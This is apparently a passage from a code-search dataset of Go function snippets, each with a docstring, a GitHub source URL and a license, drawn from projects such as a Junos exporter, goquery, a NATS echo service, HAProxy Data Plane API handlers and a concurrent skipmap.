} | Name returns the name of the collector | https://github.com/czerwonk/junos_exporter/blob/9808212c8ee15827e6e3c762c2335ed679de1492/interfacediagnostics/collector.go#L78-L80 | package interfacediagnostics
import (
"encoding/xml"
"log"
"math"
"strconv"
"strings"
"github.com/czerwonk/junos_exporter/interfacelabels"
"github.com/czerwonk/junos_exporter/rpc"
"github.com/czerwonk/junos_exporter/collector"
"github.com/prometheus/client_golang/prometheus"
)
const prefix = "junos_interface_diagnostics_"
type interfaceDiagnosticsCollector struct {
labels *interfacelabels.DynamicLabels
laserBiasCurrentDesc *prometheus.Desc
laserBiasCurrentHighAlarmThresholdDesc *prometheus.Desc
laserBiasCurrentLowAlarmThresholdDesc *prometheus.Desc
laserBiasCurrentHighWarnThresholdDesc *prometheus.Desc
laserBiasCurrentLowWarnThresholdDesc *prometheus.Desc
laserOutputPowerDesc *prometheus.Desc
laserOutputPowerHighAlarmThresholdDesc *prometheus.Desc
laserOutputPowerLowAlarmThresholdDesc *prometheus.Desc
laserOutputPowerHighWarnThresholdDesc *prometheus.Desc
laserOutputPowerLowWarnThresholdDesc *prometheus.Desc
laserOutputPowerDbmDesc *prometheus.Desc
laserOutputPowerHighAlarmThresholdDbmDesc *prometheus.Desc
laserOutputPowerLowAlarmThresholdDbmDesc *prometheus.Desc
laserOutputPowerHighWarnThresholdDbmDesc *prometheus.Desc
laserOutputPowerLowWarnThresholdDbmDesc *prometheus.Desc
moduleTemperatureDesc *prometheus.Desc
moduleTemperatureHighAlarmThresholdDesc *prometheus.Desc
moduleTemperatureLowAlarmThresholdDesc *prometheus.Desc
moduleTemperatureHighWarnThresholdDesc *prometheus.Desc
moduleTemperatureLowWarnThresholdDesc *prometheus.Desc
laserRxOpticalPowerDesc *prometheus.Desc
laserRxOpticalPowerHighAlarmThresholdDesc *prometheus.Desc
laserRxOpticalPowerLowAlarmThresholdDesc *prometheus.Desc
laserRxOpticalPowerHighWarnThresholdDesc *prometheus.Desc
laserRxOpticalPowerLowWarnThresholdDesc *prometheus.Desc
laserRxOpticalPowerDbmDesc *prometheus.Desc
laserRxOpticalPowerHighAlarmThresholdDbmDesc *prometheus.Desc
laserRxOpticalPowerLowAlarmThresholdDbmDesc *prometheus.Desc
laserRxOpticalPowerHighWarnThresholdDbmDesc *prometheus.Desc
laserRxOpticalPowerLowWarnThresholdDbmDesc *prometheus.Desc
moduleVoltageDesc *prometheus.Desc
moduleVoltageHighAlarmThresholdDesc *prometheus.Desc
moduleVoltageLowAlarmThresholdDesc *prometheus.Desc
moduleVoltageHighWarnThresholdDesc *prometheus.Desc
moduleVoltageLowWarnThresholdDesc *prometheus.Desc
rxSignalAvgOpticalPowerDesc *prometheus.Desc
rxSignalAvgOpticalPowerDbmDesc *prometheus.Desc
}
func NewCollector(labels *interfacelabels.DynamicLabels) collector.RPCCollector {
c := &interfaceDiagnosticsCollector{
labels: labels,
}
c.init()
return c
} | MIT License |
adzimzf/tpot | config/config.go | EditPlain | go | func (c *Config) EditPlain(envName, configPlain string) (string, error) {
result, err := editor.Edit(configPlain, "edit_proxy*.yaml")
if err != nil {
return "", err
}
var tmpConfig Config
if err := yaml.Unmarshal([]byte(result), &tmpConfig); err != nil {
return result, err
}
if l := len(tmpConfig.Proxies); l != 1 {
return result, fmt.Errorf("need one proxy confugration, find %d", l)
}
newProxy, err := tmpConfig.FindProxy(envName)
if err != nil {
newProxy = tmpConfig.Proxies[0]
}
if err := newProxy.Validate(); err != nil {
return result, fmt.Errorf("failed to validate %v", err)
}
for i, proxy := range c.Proxies {
if proxy.Env == envName {
c.Proxies[i] = newProxy
}
}
return result, c.save()
} | EditPlain edit specific proxy configuration by config plain | https://github.com/adzimzf/tpot/blob/f0483be3116ef0948c5420880a9af3ac085729a7/config/config.go#L159-L189 | package config
import (
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"os"
"github.com/adzimzf/tpot/editor"
"github.com/manifoldco/promptui"
"gopkg.in/yaml.v2"
)
var (
Dir = os.Getenv("HOME") + "/.tpot/"
ErrValidateConfig = errors.New("config is invalid")
)
const configFileName = "config.yaml"
type Config struct {
Editor string `json:"editor" yaml:"editor"`
Proxies []*Proxy `json:"proxies" yaml:"proxies"`
}
func NewConfig() (*Config, error) {
if err := addConfigDirExist(); err != nil {
return nil, err
}
config, err := getConfig()
if errors.Is(err, os.ErrNotExist) {
config = &Config{
Editor: editor.DefaultEditor,
}
if err := config.save(); err != nil {
return nil, err
}
} else if err != nil {
return nil, err
}
return config, nil
}
func getConfig() (*Config, error) {
bytes, err := ioutil.ReadFile(Dir + configFileName)
if errors.Is(err, os.ErrNotExist) {
bytes, err := ioutil.ReadFile(Dir + "config.json")
if err != nil {
return nil, err
}
var config Config
err = json.Unmarshal(bytes, &config)
if err != nil {
return nil, err
}
if err = config.save(); err != nil {
return nil, err
}
return &config, nil
}
if err != nil {
return nil, err
}
var config Config
err = yaml.Unmarshal(bytes, &config)
if err != nil {
return nil, err
}
return &config, nil
}
func (c *Config) Add() (string, error) {
return c.AddPlain(proxyTemplate)
}
func (c *Config) AddPlain(configPlain string) (string, error) {
result, err := editor.Edit(configPlain, "add_proxy*.yaml")
if err != nil {
return "", err
}
if result == proxyTemplate {
return "", fmt.Errorf("there's no proxy was added")
}
var tmpConfig Config
if err := yaml.Unmarshal([]byte(result), &tmpConfig); err != nil {
return result, err
}
if l := len(tmpConfig.Proxies); l != 1 {
return result, fmt.Errorf("need one proxy confugration, find %d", l)
}
if err := tmpConfig.Proxies[0].Validate(); err != nil {
return result, fmt.Errorf("failed to validate %v", err)
}
_, err = c.FindProxy(tmpConfig.Proxies[0].Env)
if err != ErrEnvNotFound {
return result, fmt.Errorf("environment %s is already exist", tmpConfig.Proxies[0].Env)
}
c.Proxies = append(c.Proxies, tmpConfig.Proxies[0])
return result, c.save()
}
func (c *Config) save() error {
bytes, err := yaml.Marshal(&c)
if err != nil {
return err
}
return ioutil.WriteFile(Dir+configFileName, bytes, permission)
}
func (c *Config) Edit(envName string) (string, error) {
proxy, err := c.FindProxy(envName)
if err != nil {
return "", fmt.Errorf("proxy %s is not found", envName)
}
tmpConfig := Config{
Proxies: []*Proxy{
proxy,
},
}
marshal, err := yaml.Marshal(tmpConfig)
if err != nil {
return "", fmt.Errorf("proxy confugration is invalid")
}
return c.EditPlain(envName, string(marshal))
} | MIT License |
tejo/boxed | vendor/github.com/PuerkitoBio/goquery/traversal.go | PrevAllMatcher | go | func (s *Selection) PrevAllMatcher(m Matcher) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingPrevAll, nil, nil), m)
} | PrevAllMatcher gets all the preceding siblings of each element in the
Selection filtered by a matcher. It returns a new Selection object
containing the matched elements. | https://github.com/tejo/boxed/blob/35c0b0e250ab3a71a7507efd9685aad3523d3fea/vendor/github.com/PuerkitoBio/goquery/traversal.go#L360-L362 | package goquery
import (
"github.com/andybalholm/cascadia"
"golang.org/x/net/html"
)
type siblingType int
const (
siblingPrevUntil siblingType = iota - 3
siblingPrevAll
siblingPrev
siblingAll
siblingNext
siblingNextAll
siblingNextUntil
siblingAllIncludingNonElements
)
func (s *Selection) Find(selector string) *Selection {
return pushStack(s, findWithMatcher(s.Nodes, cascadia.MustCompile(selector)))
}
func (s *Selection) FindMatcher(m Matcher) *Selection {
return pushStack(s, findWithMatcher(s.Nodes, m))
}
func (s *Selection) FindSelection(sel *Selection) *Selection {
if sel == nil {
return pushStack(s, nil)
}
return s.FindNodes(sel.Nodes...)
}
func (s *Selection) FindNodes(nodes ...*html.Node) *Selection {
return pushStack(s, mapNodes(nodes, func(i int, n *html.Node) []*html.Node {
if sliceContains(s.Nodes, n) {
return []*html.Node{n}
}
return nil
}))
}
func (s *Selection) Contents() *Selection {
return pushStack(s, getChildrenNodes(s.Nodes, siblingAllIncludingNonElements))
}
func (s *Selection) ContentsFiltered(selector string) *Selection {
if selector != "" {
return s.ChildrenFiltered(selector)
}
return s.Contents()
}
func (s *Selection) ContentsMatcher(m Matcher) *Selection {
return s.ChildrenMatcher(m)
}
func (s *Selection) Children() *Selection {
return pushStack(s, getChildrenNodes(s.Nodes, siblingAll))
}
func (s *Selection) ChildrenFiltered(selector string) *Selection {
return filterAndPush(s, getChildrenNodes(s.Nodes, siblingAll), cascadia.MustCompile(selector))
}
func (s *Selection) ChildrenMatcher(m Matcher) *Selection {
return filterAndPush(s, getChildrenNodes(s.Nodes, siblingAll), m)
}
func (s *Selection) Parent() *Selection {
return pushStack(s, getParentNodes(s.Nodes))
}
func (s *Selection) ParentFiltered(selector string) *Selection {
return filterAndPush(s, getParentNodes(s.Nodes), cascadia.MustCompile(selector))
}
func (s *Selection) ParentMatcher(m Matcher) *Selection {
return filterAndPush(s, getParentNodes(s.Nodes), m)
}
func (s *Selection) Closest(selector string) *Selection {
cs := cascadia.MustCompile(selector)
return s.ClosestMatcher(cs)
}
func (s *Selection) ClosestMatcher(m Matcher) *Selection {
return pushStack(s, mapNodes(s.Nodes, func(i int, n *html.Node) []*html.Node {
for ; n != nil; n = n.Parent {
if m.Match(n) {
return []*html.Node{n}
}
}
return nil
}))
}
func (s *Selection) ClosestNodes(nodes ...*html.Node) *Selection {
return pushStack(s, mapNodes(s.Nodes, func(i int, n *html.Node) []*html.Node {
for ; n != nil; n = n.Parent {
if isInSlice(nodes, n) {
return []*html.Node{n}
}
}
return nil
}))
}
func (s *Selection) ClosestSelection(sel *Selection) *Selection {
if sel == nil {
return pushStack(s, nil)
}
return s.ClosestNodes(sel.Nodes...)
}
func (s *Selection) Parents() *Selection {
return pushStack(s, getParentsNodes(s.Nodes, nil, nil))
}
func (s *Selection) ParentsFiltered(selector string) *Selection {
return filterAndPush(s, getParentsNodes(s.Nodes, nil, nil), cascadia.MustCompile(selector))
}
func (s *Selection) ParentsMatcher(m Matcher) *Selection {
return filterAndPush(s, getParentsNodes(s.Nodes, nil, nil), m)
}
func (s *Selection) ParentsUntil(selector string) *Selection {
return pushStack(s, getParentsNodes(s.Nodes, cascadia.MustCompile(selector), nil))
}
func (s *Selection) ParentsUntilMatcher(m Matcher) *Selection {
return pushStack(s, getParentsNodes(s.Nodes, m, nil))
}
func (s *Selection) ParentsUntilSelection(sel *Selection) *Selection {
if sel == nil {
return s.Parents()
}
return s.ParentsUntilNodes(sel.Nodes...)
}
func (s *Selection) ParentsUntilNodes(nodes ...*html.Node) *Selection {
return pushStack(s, getParentsNodes(s.Nodes, nil, nodes))
}
func (s *Selection) ParentsFilteredUntil(filterSelector, untilSelector string) *Selection {
return filterAndPush(s, getParentsNodes(s.Nodes, cascadia.MustCompile(untilSelector), nil), cascadia.MustCompile(filterSelector))
}
func (s *Selection) ParentsFilteredUntilMatcher(filter, until Matcher) *Selection {
return filterAndPush(s, getParentsNodes(s.Nodes, until, nil), filter)
}
func (s *Selection) ParentsFilteredUntilSelection(filterSelector string, sel *Selection) *Selection {
return s.ParentsMatcherUntilSelection(cascadia.MustCompile(filterSelector), sel)
}
func (s *Selection) ParentsMatcherUntilSelection(filter Matcher, sel *Selection) *Selection {
if sel == nil {
return s.ParentsMatcher(filter)
}
return s.ParentsMatcherUntilNodes(filter, sel.Nodes...)
}
func (s *Selection) ParentsFilteredUntilNodes(filterSelector string, nodes ...*html.Node) *Selection {
return filterAndPush(s, getParentsNodes(s.Nodes, nil, nodes), cascadia.MustCompile(filterSelector))
}
func (s *Selection) ParentsMatcherUntilNodes(filter Matcher, nodes ...*html.Node) *Selection {
return filterAndPush(s, getParentsNodes(s.Nodes, nil, nodes), filter)
}
func (s *Selection) Siblings() *Selection {
return pushStack(s, getSiblingNodes(s.Nodes, siblingAll, nil, nil))
}
func (s *Selection) SiblingsFiltered(selector string) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingAll, nil, nil), cascadia.MustCompile(selector))
}
func (s *Selection) SiblingsMatcher(m Matcher) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingAll, nil, nil), m)
}
func (s *Selection) Next() *Selection {
return pushStack(s, getSiblingNodes(s.Nodes, siblingNext, nil, nil))
}
func (s *Selection) NextFiltered(selector string) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingNext, nil, nil), cascadia.MustCompile(selector))
}
func (s *Selection) NextMatcher(m Matcher) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingNext, nil, nil), m)
}
func (s *Selection) NextAll() *Selection {
return pushStack(s, getSiblingNodes(s.Nodes, siblingNextAll, nil, nil))
}
func (s *Selection) NextAllFiltered(selector string) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingNextAll, nil, nil), cascadia.MustCompile(selector))
}
func (s *Selection) NextAllMatcher(m Matcher) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingNextAll, nil, nil), m)
}
func (s *Selection) Prev() *Selection {
return pushStack(s, getSiblingNodes(s.Nodes, siblingPrev, nil, nil))
}
func (s *Selection) PrevFiltered(selector string) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingPrev, nil, nil), cascadia.MustCompile(selector))
}
func (s *Selection) PrevMatcher(m Matcher) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingPrev, nil, nil), m)
}
func (s *Selection) PrevAll() *Selection {
return pushStack(s, getSiblingNodes(s.Nodes, siblingPrevAll, nil, nil))
}
func (s *Selection) PrevAllFiltered(selector string) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingPrevAll, nil, nil), cascadia.MustCompile(selector))
} | BSD 2-Clause Simplified License |
magicsong/sonargo | sonar/projects_service.go | Create | go | func (s *ProjectsService) Create(opt *ProjectsCreateOption) (v *ProjectsCreateObject, resp *http.Response, err error) {
err = s.ValidateCreateOpt(opt)
if err != nil {
return
}
req, err := s.client.NewRequest("POST", "projects/create", opt)
if err != nil {
return
}
v = new(ProjectsCreateObject)
resp, err = s.client.Do(req, v)
if err != nil {
return nil, resp, err
}
return
} | Create Create a project.<br/>Requires 'Create Projects' permission | https://github.com/magicsong/sonargo/blob/103eda7abc20bd192a064b6eb94ba26329e339f1/sonar/projects_service.go#L98-L113 | package sonargo
import "net/http"
type ProjectsService struct {
client *Client
}
const (
ProjectVisibilityPublic = "public"
ProjectVisibilityPrivate = "private"
)
type ProjectsBulkUpdateKeyObject struct {
Keys []*Key `json:"keys,omitempty"`
}
type Key struct {
Duplicate bool `json:"duplicate,omitempty"`
Key string `json:"key,omitempty"`
NewKey string `json:"newKey,omitempty"`
}
type Project struct {
CreationDate string `json:"creationDate,omitempty"`
Key string `json:"key,omitempty"`
Name string `json:"name,omitempty"`
Qualifier string `json:"qualifier,omitempty"`
UUID string `json:"uuid,omitempty"`
Visibility string `json:"visibility,omitempty"`
}
type ProjectsCreateObject struct {
Project *Project `json:"project,omitempty"`
}
type ProjectsBulkDeleteOption struct {
AnalyzedBefore string `url:"analyzedBefore,omitempty"`
OnProvisionedOnly string `url:"onProvisionedOnly,omitempty"`
ProjectIds string `url:"projectIds,omitempty"`
Projects string `url:"projects,omitempty"`
Q string `url:"q,omitempty"`
Qualifiers string `url:"qualifiers,omitempty"`
}
func (s *ProjectsService) BulkDelete(opt *ProjectsBulkDeleteOption) (resp *http.Response, err error) {
err = s.ValidateBulkDeleteOpt(opt)
if err != nil {
return
}
req, err := s.client.NewRequest("POST", "projects/bulk_delete", opt)
if err != nil {
return
}
resp, err = s.client.Do(req, nil)
if err != nil {
return
}
return
}
type ProjectsBulkUpdateKeyOption struct {
DryRun string `url:"dryRun,omitempty"`
From string `url:"from,omitempty"`
Project string `url:"project,omitempty"`
ProjectId string `url:"projectId,omitempty"`
To string `url:"to,omitempty"`
}
func (s *ProjectsService) BulkUpdateKey(opt *ProjectsBulkUpdateKeyOption) (v *ProjectsBulkUpdateKeyObject, resp *http.Response, err error) {
err = s.ValidateBulkUpdateKeyOpt(opt)
if err != nil {
return
}
req, err := s.client.NewRequest("POST", "projects/bulk_update_key", opt)
if err != nil {
return
}
v = new(ProjectsBulkUpdateKeyObject)
resp, err = s.client.Do(req, v)
if err != nil {
return nil, resp, err
}
return
}
type ProjectsCreateOption struct {
Branch string `url:"branch,omitempty"`
Name string `url:"name,omitempty"`
Project string `url:"project,omitempty"`
Visibility string `url:"visibility,omitempty"`
} | Apache License 2.0 |
lindell/multi-gitter | internal/multigitter/terminal/terminal.go | Bold | go | func Bold(text string) string {
return fmt.Sprintf("\033[1m%s\033[0m", text)
} | Bold generates a bold text for the terminal | https://github.com/lindell/multi-gitter/blob/7c0e8705becde451da4b4ed6eb649d5e4aa832fe/internal/multigitter/terminal/terminal.go#L12-L14 | package terminal
import "fmt"
func Link(text, url string) string {
return fmt.Sprintf("\x1B]8;;%s\a%s\x1B]8;;\a", url, text)
} | Apache License 2.0 |
propervillain/moistpetal | subcmd/banner.go | Farewell | go | func Farewell() string {
r := chalk.Red.NewStyle()
s := "" +
" _ _ __ __ _ _ \n" +
" ( | )/_/ \\_\\( | ) \n" +
" __( >O< ) " + r.Style(".Goodbye.") + " ( >O< )__\n" +
" \\_\\(_|_) (_|_)/_/\n"
return s
} | Standard exit banner. | https://github.com/propervillain/moistpetal/blob/2d61232d12b05a09ee5940607e6b66168a1de108/subcmd/banner.go#L23-L31 | package subcmd
import (
"github.com/ttacon/chalk"
)
func Banner() string {
s := "\n" +
" o o o 8\n" +
" 8 8 8\n" +
" ooYoYo. .oPYo. o8 .oPYo. o8P .oPYo. .oPYo. o8P .oPYo. 8\n" +
" 8' 8 8 8 8 8 Yb.. 8 8 8 8oooo8 8 .oooo8 8\n" +
" 8 8 8 8. 8 8 'Yb. 8 8 8 8. 8 8 8 8\n" +
" 8 8 8 `Yooo' 8 `YooP' 8 8YooP' `Yooo' 8 `YooP8 8\n" +
" 8 \n" +
" 8 \n"
s = chalk.Green.NewStyle().Style(s)
return s
} | Apache License 2.0 |
tikv/client-go | txnkv/lock_export.go | NewLock | go | func NewLock(l *kvrpcpb.LockInfo) *Lock {
return txnlock.NewLock(l)
} | NewLock creates a new *Lock. | https://github.com/tikv/client-go/blob/a7d8ea1587e085fa951389656998493e841bccf7/txnkv/lock_export.go#L32-L34 | package txnkv
import (
"github.com/pingcap/kvproto/pkg/kvrpcpb"
"github.com/tikv/client-go/v2/txnkv/txnlock"
)
type Lock = txnlock.Lock
type LockResolver = txnlock.LockResolver
type TxnStatus = txnlock.TxnStatus | Apache License 2.0 |
jmhodges/howsmyssl | vendor/google.golang.org/grpc/internal/metadata/metadata.go | Set | go | func Set(addr resolver.Address, md metadata.MD) resolver.Address {
addr.Attributes = addr.Attributes.WithValues(mdKey, md)
return addr
} | Set sets (overrides) the metadata in addr.
When a SubConn is created with this address, the RPCs sent on it will all
have this metadata. | https://github.com/jmhodges/howsmyssl/blob/b72af40d21cbb12b85932ef1bc18e50459f39263/vendor/google.golang.org/grpc/internal/metadata/metadata.go#L47-L50 | package metadata
import (
"google.golang.org/grpc/metadata"
"google.golang.org/grpc/resolver"
)
type mdKeyType string
const mdKey = mdKeyType("grpc.internal.address.metadata")
func Get(addr resolver.Address) metadata.MD {
attrs := addr.Attributes
if attrs == nil {
return nil
}
md, _ := attrs.Value(mdKey).(metadata.MD)
return md
} | MIT License |
triggermesh/tm | pkg/resources/pipelineresource/pipelineresource_test.go | TestList | go | func TestList(t *testing.T) {
namespace := "test-namespace"
if ns, ok := os.LookupEnv("NAMESPACE"); ok {
namespace = ns
}
testClient, err := client.NewClient(client.ConfigPath(""))
assert.NoError(t, err)
pipeline := &PipelineResource{Name: "Foo", Namespace: namespace}
_, err = pipeline.List(&testClient)
assert.NoError(t, err)
} | func TestCreate(t *testing.T) {
namespace := "test-namespace"
if ns, ok := os.LookupEnv("NAMESPACE"); ok {
namespace = ns
}
testClient, err := client.NewClient(client.ConfigPath(""))
assert.NoError(t, err)
pipeline := &PipelineResource{Name: "foo-bar", Namespace: namespace}
err = pipeline.Deploy(&testClient)
assert.NoError(t, err)
pipeline = &PipelineResource{Name: "foo-bar", Namespace: namespace}
err = pipeline.Deploy(&testClient)
assert.Error(t, err)
result, err := pipeline.Get(&testClient)
assert.NoError(t, err)
assert.Equal(t, "foo-bar", result.Name)
err = pipeline.Delete(&testClient)
assert.NoError(t, err)
} | https://github.com/triggermesh/tm/blob/7be2b2dc6a9f3deacdaaed20d679014a3d425491/pkg/resources/pipelineresource/pipelineresource_test.go#L51-L63 | package pipelineresource
import (
"os"
"testing"
"github.com/stretchr/testify/assert"
"github.com/triggermesh/tm/pkg/client"
) | Apache License 2.0 |
bitgo/prova | btcec/internal_test.go | TstIsJacobianOnCurve | go | func (curve *KoblitzCurve) TstIsJacobianOnCurve(x, y, z *fieldVal) bool {
var y2, z2, x3, result fieldVal
y2.SquareVal(y).Normalize()
z2.SquareVal(z)
x3.SquareVal(x).Mul(x)
result.SquareVal(&z2).Mul(&z2).MulInt(7).Add(&x3).Normalize()
return y2.Equals(&result)
} | TstIsJacobianOnCurve returns boolean if the point (x,y,z) is on the curve. | https://github.com/bitgo/prova/blob/18f923b3c9245c230eab66778885ad1aa644f049/btcec/internal_test.go#L41-L54 | package btcec
import (
"math/big"
)
const (
TstPubkeyUncompressed = pubkeyUncompressed
TstPubkeyCompressed = pubkeyCompressed
TstPubkeyHybrid = pubkeyHybrid
)
func (f *fieldVal) TstRawInts() [10]uint32 {
return f.n
}
func (f *fieldVal) TstSetRawInts(raw [10]uint32) *fieldVal {
for i := 0; i < len(raw); i++ {
f.n[i] = raw[i]
}
return f
}
func (curve *KoblitzCurve) TstFieldJacobianToBigAffine(x, y, z *fieldVal) (*big.Int, *big.Int) {
return curve.fieldJacobianToBigAffine(x, y, z)
} | ISC License |
nats-io/go-nats | examples/nats-echo/main.go | lookupGeo | go | func lookupGeo() string {
c := &http.Client{Timeout: 2 * time.Second}
resp, err := c.Get("https://ipinfo.io")
if err != nil || resp == nil {
log.Fatalf("Could not retrive geo location data: %v", err)
}
defer resp.Body.Close()
body, _ := ioutil.ReadAll(resp.Body)
g := geo{}
if err := json.Unmarshal(body, &g); err != nil {
log.Fatalf("Error unmarshalling geo: %v", err)
}
return g.Region + ", " + g.Country
} | lookup our current region and country.. | https://github.com/nats-io/go-nats/blob/73ffc26dfe70cc3b217df38d209c83b6d07eaf3c/examples/nats-echo/main.go#L153-L166 | package main
import (
"encoding/json"
"flag"
"fmt"
"io/ioutil"
"log"
"net/http"
"os"
"os/signal"
"runtime"
"syscall"
"time"
"github.com/nats-io/go-nats"
)
func usage() {
log.Printf("Usage: nats-echo [-s server] [-creds file] [-t] <subject>\n")
flag.PrintDefaults()
}
func printMsg(m *nats.Msg, i int) {
log.Printf("[#%d] Echoing to [%s]: %q", i, m.Reply, m.Data)
}
func main() {
var urls = flag.String("s", nats.DefaultURL, "The nats server URLs (separated by comma)")
var userCreds = flag.String("creds", "", "User Credentials File")
var showTime = flag.Bool("t", false, "Display timestamps")
var geoloc = flag.Bool("geo", false, "Display geo location of echo service")
var geo string
log.SetFlags(0)
flag.Usage = usage
flag.Parse()
args := flag.Args()
if len(args) != 1 {
usage()
}
if *geoloc {
geo = lookupGeo()
}
opts := []nats.Option{nats.Name("NATS Echo Service")}
opts = setupConnOptions(opts)
if *userCreds != "" {
opts = append(opts, nats.UserCredentials(*userCreds))
}
nc, err := nats.Connect(*urls, opts...)
if err != nil {
log.Fatal(err)
}
subj, i := args[0], 0
nc.QueueSubscribe(subj, "echo", func(msg *nats.Msg) {
i++
if msg.Reply != "" {
printMsg(msg, i)
if geo != "" {
m := fmt.Sprintf("[%s]: %q", geo, msg.Data)
nc.Publish(msg.Reply, []byte(m))
} else {
nc.Publish(msg.Reply, msg.Data)
}
}
})
nc.Flush()
if err := nc.LastError(); err != nil {
log.Fatal(err)
}
log.Printf("Echo Service listening on [%s]\n", subj)
c := make(chan os.Signal, 1)
signal.Notify(c, syscall.SIGINT)
go func() {
<-c
log.Printf("<caught signal - draining>")
nc.Drain()
}()
if *showTime {
log.SetFlags(log.LstdFlags)
}
runtime.Goexit()
}
func setupConnOptions(opts []nats.Option) []nats.Option {
totalWait := 10 * time.Minute
reconnectDelay := time.Second
opts = append(opts, nats.ReconnectWait(reconnectDelay))
opts = append(opts, nats.MaxReconnects(int(totalWait/reconnectDelay)))
opts = append(opts, nats.DisconnectHandler(func(nc *nats.Conn) {
if !nc.IsClosed() {
log.Printf("Disconnected: will attempt reconnects for %.0fm", totalWait.Minutes())
}
}))
opts = append(opts, nats.ReconnectHandler(func(nc *nats.Conn) {
log.Printf("Reconnected [%s]", nc.ConnectedUrl())
}))
opts = append(opts, nats.ClosedHandler(func(nc *nats.Conn) {
if !nc.IsClosed() {
log.Fatal("Exiting: no servers available")
} else {
log.Fatal("Exiting")
}
}))
return opts
}
type geo struct {
Region string
Country string
} | Apache License 2.0 |
haproxytech/dataplaneapi | handlers/filter.go | Handle | go | func (h *GetFilterHandlerImpl) Handle(params filter.GetFilterParams, principal interface{}) middleware.Responder {
t := ""
if params.TransactionID != nil {
t = *params.TransactionID
}
v, f, err := h.Client.Configuration.GetFilter(params.Index, params.ParentType, params.ParentName, t)
if err != nil {
e := misc.HandleError(err)
return filter.NewGetFilterDefault(int(*e.Code)).WithPayload(e)
}
return filter.NewGetFilterOK().WithPayload(&filter.GetFilterOKBody{Version: v, Data: f})
} | Handle executing the request and returning a response | https://github.com/haproxytech/dataplaneapi/blob/b362aae0b04d0e330bd9dcfbf9f315b670de013b/handlers/filter.go#L139-L151 | package handlers
import (
"github.com/go-openapi/runtime/middleware"
client_native "github.com/haproxytech/client-native/v2"
"github.com/haproxytech/client-native/v2/models"
"github.com/haproxytech/dataplaneapi/haproxy"
"github.com/haproxytech/dataplaneapi/misc"
"github.com/haproxytech/dataplaneapi/operations/filter"
)
type CreateFilterHandlerImpl struct {
Client *client_native.HAProxyClient
ReloadAgent haproxy.IReloadAgent
}
type DeleteFilterHandlerImpl struct {
Client *client_native.HAProxyClient
ReloadAgent haproxy.IReloadAgent
}
type GetFilterHandlerImpl struct {
Client *client_native.HAProxyClient
}
type GetFiltersHandlerImpl struct {
Client *client_native.HAProxyClient
}
type ReplaceFilterHandlerImpl struct {
Client *client_native.HAProxyClient
ReloadAgent haproxy.IReloadAgent
}
func (h *CreateFilterHandlerImpl) Handle(params filter.CreateFilterParams, principal interface{}) middleware.Responder {
t := ""
v := int64(0)
if params.TransactionID != nil {
t = *params.TransactionID
}
if params.Version != nil {
v = *params.Version
}
if t != "" && *params.ForceReload {
msg := "Both force_reload and transaction specified, specify only one"
c := misc.ErrHTTPBadRequest
e := &models.Error{
Message: &msg,
Code: &c,
}
return filter.NewCreateFilterDefault(int(*e.Code)).WithPayload(e)
}
err := h.Client.Configuration.CreateFilter(params.ParentType, params.ParentName, params.Data, t, v)
if err != nil {
e := misc.HandleError(err)
return filter.NewCreateFilterDefault(int(*e.Code)).WithPayload(e)
}
if params.TransactionID == nil {
if *params.ForceReload {
err := h.ReloadAgent.ForceReload()
if err != nil {
e := misc.HandleError(err)
return filter.NewCreateFilterDefault(int(*e.Code)).WithPayload(e)
}
return filter.NewCreateFilterCreated().WithPayload(params.Data)
}
rID := h.ReloadAgent.Reload()
return filter.NewCreateFilterAccepted().WithReloadID(rID).WithPayload(params.Data)
}
return filter.NewCreateFilterAccepted().WithPayload(params.Data)
}
func (h *DeleteFilterHandlerImpl) Handle(params filter.DeleteFilterParams, principal interface{}) middleware.Responder {
t := ""
v := int64(0)
if params.TransactionID != nil {
t = *params.TransactionID
}
if params.Version != nil {
v = *params.Version
}
if t != "" && *params.ForceReload {
msg := "Both force_reload and transaction specified, specify only one"
c := misc.ErrHTTPBadRequest
e := &models.Error{
Message: &msg,
Code: &c,
}
return filter.NewDeleteFilterDefault(int(*e.Code)).WithPayload(e)
}
err := h.Client.Configuration.DeleteFilter(params.Index, params.ParentType, params.ParentName, t, v)
if err != nil {
e := misc.HandleError(err)
return filter.NewDeleteFilterDefault(int(*e.Code)).WithPayload(e)
}
if params.TransactionID == nil {
if *params.ForceReload {
err := h.ReloadAgent.ForceReload()
if err != nil {
e := misc.HandleError(err)
return filter.NewDeleteFilterDefault(int(*e.Code)).WithPayload(e)
}
return filter.NewDeleteFilterNoContent()
}
rID := h.ReloadAgent.Reload()
return filter.NewDeleteFilterAccepted().WithReloadID(rID)
}
return filter.NewDeleteFilterAccepted()
} | Apache License 2.0 |
bytedance/gopkg | collection/skipmap/skipmap.go | findNodeDelete | go | func (s *Int64Map) findNodeDelete(key int64, preds *[maxLevel]*int64Node, succs *[maxLevel]*int64Node) int {
lFound, x := -1, s.header
for i := int(atomic.LoadInt64(&s.highestLevel)) - 1; i >= 0; i-- {
succ := x.atomicLoadNext(i)
for succ != nil && succ.lessthan(key) {
x = succ
succ = x.atomicLoadNext(i)
}
preds[i] = x
succs[i] = succ
if lFound == -1 && succ != nil && succ.equal(key) {
lFound = i
}
}
return lFound
} | findNodeDelete takes a key and two maximal-height arrays then searches exactly as in a sequential skip-list.
The returned preds and succs always satisfy preds[i] > key >= succs[i]. | https://github.com/bytedance/gopkg/blob/9ad039f26230452b631a627edc075b51a0125d0c/collection/skipmap/skipmap.go#L120-L138 | package skipmap
import (
"sync"
"sync/atomic"
"unsafe"
)
type Int64Map struct {
header *int64Node
length int64
highestLevel int64
}
type int64Node struct {
key int64
value unsafe.Pointer
next optionalArray
mu sync.Mutex
flags bitflag
level uint32
}
func newInt64Node(key int64, value interface{}, level int) *int64Node {
node := &int64Node{
key: key,
level: uint32(level),
}
node.storeVal(value)
if level > op1 {
node.next.extra = new([op2]unsafe.Pointer)
}
return node
}
func (n *int64Node) storeVal(value interface{}) {
atomic.StorePointer(&n.value, unsafe.Pointer(&value))
}
func (n *int64Node) loadVal() interface{} {
